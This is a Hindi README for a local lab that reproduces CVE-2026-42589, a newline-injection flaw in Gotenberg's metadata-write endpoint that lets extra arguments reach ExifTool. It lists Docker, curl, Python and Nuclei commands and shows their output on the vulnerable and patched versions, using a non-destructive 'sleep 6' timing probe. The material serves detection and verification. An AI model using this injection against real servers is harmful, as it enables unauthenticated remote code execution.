
POC_CVE-2026-42589
CVE-2026-42589 को प्रभावित करने वाले गोटेनबर्ग के लिए स्थानीय पुनरुत्पादन प्रयोगशाला और न्यूक्ली टेम्पलेट ड्राफ्ट।
CVE-2026-42589 गोटेनबर्ग में एक अप्रमाणित रिमोट कोड निष्पादन समस्या है, जो मेटाडेटा कुंजी में न्यूलाइन इंजेक्शन के कारण होती है:
POST /forms/pdfengines/metadata/write
प्रभावित गोटेनबर्ग उपयोगकर्ता-नियंत्रित मेटाडेटा कुंजियों को ExifTool को अग्रेषित करता है बिना नियंत्रण वर्णों को अस्वीकार किए। JSON-एस्केप्ड न्यूलाइन वाली मेटाडेटा कुंजी अतिरिक्त ExifTool तर्कों में विभाजित हो सकती है।
इस प्रयोगशाला का उपयोग सत्यापित करने के लिए किया गया:
gotenberg/gotenberg:8.29.1 पर संवेदनशील व्यवहारgotenberg/gotenberg:8.31.0 पर पैच किया गया व्यवहारन्यूक्ली टेम्पलेट केवल एक गैर-विनाशकारी sleep 6 टाइमिंग जांच का उपयोग करता है।
docker-compose.ymldocker-compose.latest.ymlCVE-2026-42589.yamlmanual_verify.pysample.pdfREADME.mdगोटेनबर्ग 8.29.1 प्रारंभ करें:
docker compose down -v
docker compose up -d
docker compose logs --tail=100 gotenberg
संस्करण जांचें:
curl -s http://127.0.0.1:3000/version
मैन्युअल रॉ मल्टीपार्ट टाइमिंग जांच:
python3 manual_verify.py http://127.0.0.1:3000
अपेक्षित संवेदनशील संकेत:
HTTP/1.1 500 Internal Server Error
TOTAL_TIME=6.xs
देखा गया संवेदनशील परिणाम:
HTTP/1.1 500 Internal Server Error
TOTAL_TIME=6.300s
Internal Server Error
गोटेनबर्ग 8.31.0 प्रारंभ करें:
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 gotenberg
संस्करण जांचें:
curl -s http://127.0.0.1:3000/version
वही मैन्युअल टाइमिंग जांच चलाएं:
python3 manual_verify.py http://127.0.0.1:3000
देखा गया पैच किए गए संस्करण का परिणाम:
HTTP/1.1 400 Bad Request
TOTAL_TIME=0.145s
At least one PDF engine cannot process the requested metadata, while others may have failed to convert due to different issues
टेम्पलेट सत्यापित करें:
nuclei -duc -validate -t CVE-2026-42589.yaml
संवेदनशील लक्ष्य के विरुद्ध चलाएं:
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2026-42589.yaml
अपेक्षित व्यवहार:
8.29.1: विलंबित 500 प्रतिक्रिया के बाद मिलान8.31.0: कोई मिलान नहींदेखा गया संवेदनशील परिणाम:
[CVE-2026-42589] [http] [critical] http://127.0.0.1:3000/forms/pdfengines/metadata/write
[INF] Scan completed in 6.245907708s. 1 matches found.
देखा गया पैच किए गए संस्करण का परिणाम:
[INF] Scan completed in 93.01425ms. No results found.